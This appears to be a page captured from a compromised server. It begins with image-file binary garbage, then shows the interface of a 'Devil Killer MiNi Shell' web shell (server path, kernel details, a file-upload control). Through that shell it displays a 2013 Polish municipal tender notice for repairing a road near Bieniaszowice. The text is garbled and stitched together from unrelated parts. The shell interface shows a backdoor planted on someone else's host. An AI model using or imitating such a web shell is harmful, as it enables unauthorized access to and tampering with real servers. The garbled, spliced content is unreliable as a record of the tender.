JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/33679-N-2013.html

<p class="kh_header"><b>Gręboszów: Remont drogi gminnej Bieniaszowice-Lubiczko k.Cabaja  nr K180081    w    miejscowości Bieniaszowice w km 0+060-1+030</b><br>
<b>Numer ogłoszenia: 33679 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.greboszow.intarnet.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi gminnej Bieniaszowice-Lubiczko k.Cabaja  nr K180081    w    miejscowości Bieniaszowice w km 0+060-1+030.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest   Remont drogi gminnej Bieniaszowice-Lubiczko k.Cabaja  nr K180081    w    miejscowości Bieniaszowice w km 0+060-1+030
  2.  Zakres robót budowlanych obejmuje: 
1)	Prace  przygotowawcze  1,03 km
2)	 Przebudowa przepustu  o średnicy 40 cm - 9 mb  i     80 cm - 10 mb 
3)	 Wycięcie z karczowaniem drzew 29 szt.  i   zasypanie dołów - 139,2  m3 
4)	 Nasyp pod koronę drogi gr. kat. II-III w ilości 504 m3
5)	 Stabilizacja podłoża spoiwem hydraulicznym grub. 30 cm - 3840,5  m2
6)	Podbudowa z kruszywa łamanego 0-63 mm  gr. 17 cm - 3840,5 m2  
7)	Wykonanie warstwy wiążącej z masy AC 16W gr. 5 cm - 3681,5 m2
8)	Nawierzchnia z masy bitumicznej AC 8S  warstwa ścieralna  gr. 5 cm  - 3630,0 m2
9)	Uzupełnienie poboczy  z gr kat III  z zagęszczeniem  -  218 m3 
10)	Warstwa kruszywa 0-63  w szerokości poboczy na zjazdach  gr.  21 cm - 1002 m2
11)	Warstwa z kruszywa łamanego 0-31 mm gr. 6 cm  -  1002 m2
12)	Podbudowy z masy bitumicznej gr. 6 cm  -  37,5 m2
13)	Odtworzenie rowu 280 m
14)	Odmulenie rowów ręcznie 490 m
15)	Odmulenie rowów mechaniczne  200 m 
16)	Umocnienie  skarp i dna rowów przy przepustach płytami typu krata 60x90x10 cm na betonie C15  gr. 10 cm z uzupełnieniem otworów betonem  - 28,08 m2 
17)	Zasypanie wykopów  - 38,95 m3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości  zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 10 000,00 zł, słownie:  dziesięć tysięcy  złotych, które winno być wniesione  przed upływem terminu składania     ofert. 
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
    3    Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto 
          Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział 
          Gręboszów z dopiskiem   Wadium do przetargu - Remont drogi gminnej Bieniaszowice-Lubiczko k.Cabaja.  
    4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
    5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany  jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat,   a do  oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
           Wykonawcę.  Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty   składania ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej   treści na przepis   art. 46 ust. 5 ustawy Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne   żądanie Zamawiającego.  
    6.    Wniesienie wadium w innej, niż wyżej wskazanej formie zaskutkuje uznaniem iż oferta Wykonawcy nie   jest właściwie  zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć takiego Wykonawcę  z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy Pzp.
7.    Wadium wniesione w pieniądzu  Zamawiający przechowuje na rachunku bankowym, które zwraca  wraz  z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,   pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy
       na rachunek bankowy wskazany przez wykonawcę.
8.   Zwrot wadium;
       1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty  najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
       2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia   należytego wykonania umowy, jeżeli jego wniesienia żądano,
       3) Zamawiający zwraca  niezwłocznie wadium, na wniosek  Wykonawcy, który wycofał ofertę przed   upływem terminu składania ofert.
    9.   Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium  na podstawie  ust.8 pkt 1 SIWZ, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
  10.    Zatrzymanie wadium;
       1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym  mowa w art. 26 ust. 3ustawy Pzp, nie złożył  oświadczeń lub dokumentów, o którym mowa  w art. 25 ust.1ustawy  Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie. 
2)	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
               a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
         b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
               c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie  Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie złożonego oświadczenia o spełnianiu warunków udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył) co najmniej dwie roboty budowlane polegające na: budowie, przebudowie, rozbudowie, odbudowie lub remoncie drogi  o długości  nie mniejszej niż 900 m każda   i  o wartości   robót  nie mniejszej niż 500 tys. zł brutto  każda,  i zostały wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie,  z podaniem ich rodzaju  i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
                       Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez Wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych   wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.  Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie złożonego oświadczenia o spełnianiu warunków udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje    lub dysponować będzie do realizacji zamówienia minimum 1 osobą posiadającą uprawnienia budowlane do kierowania 
              robotami budowlanymi w specjalności  drogowej, wpisaną do właściwej izby samorządu zawodowego,   posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej.
              Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza 
              odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących  przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru    Gospodarczego  oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  
              Prawo budowlane (tekst  jednolity. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach       uznawania kwalifikacji zawodowych  nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r.   nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, się posiadaniem  ubezpieczenia 
              od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej  na kwotę nie mniejszą  niż
              700 tys. zł i dysponować środkami finansowymi lub zdolnością kredytową na kwotę nie mniejszą niż 500 tys. zł
   3.        Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do 
              wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego
              łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, 
              iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym 
              celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres 
              korzystania z nich przy wykonaniu zamówienia. Wykonawca winien określić w jaki sposób  podmiot 
              udostępniający   będzie brał udział w realizacji zamówienia (np. poprzez udostępnianie pracowników, umowa 
              o współpracy, jako  podwykonawca.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Kosztorys ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy Zamawiający zawarł we wzorze  umowy stanowiący  załącznik nr 7 do  SIWZ.  
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

1)	Zmiana terminu realizacji przedmiotu umowy;
a)   Zaistnienia po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku,   rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:
      -  o charakterze  niezależnym od Stron,
   -  którego Strony nie mogły przewidzieć przed zawarciem umowy, 
-  którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej  staranności,
     -  której nie można przypisać drugiej Stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności:
a)  powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie  lub skażenia;
           b)  zmiany będące następstwem okoliczności leżących po stronie Zamawiającego  w szczególności;   wstrzymanie robót przez Zamawiającego,  spowodowanych sytuacją finansową, zdolnościami   płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były do przewidzenia    w chwili zawarcia umowy
           c)   inne przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące     niemożliwością  prowadzenia prac, np.: będące następstwem działania organów administracji,    wstrzymanie prac budowlanych przez właściwy organ, opóźnienia związane z uzyskiwaniem przez               Wykonawcę lub Zamawiającego niezbędnych w myśl ustawy Prawo budowlane dokumentów
           d)   wystąpienia istotnych wad dokumentacji projektowej, skutkującej koniecznością dokonania poprawek  lub  uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizacje określonego rodzaju robót   mających   wpływ na zmianę terminu realizacji,
           e)  innymi okolicznościami nie powstałymi  z winy Wykonawcy lub koniecznością wykonania zamówień   uzupełniających.    
           W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania  umowy   może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania  jej przedmiotu,  nie dłużej jednak niż o okres trwania tych okoliczności.
     2)    Zmiana sposobu spełniania świadczenia;
 a) zmiany stanu prawnego w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność  zmiany  sposobu wykonania  zamówienia przez Wykonawcę.
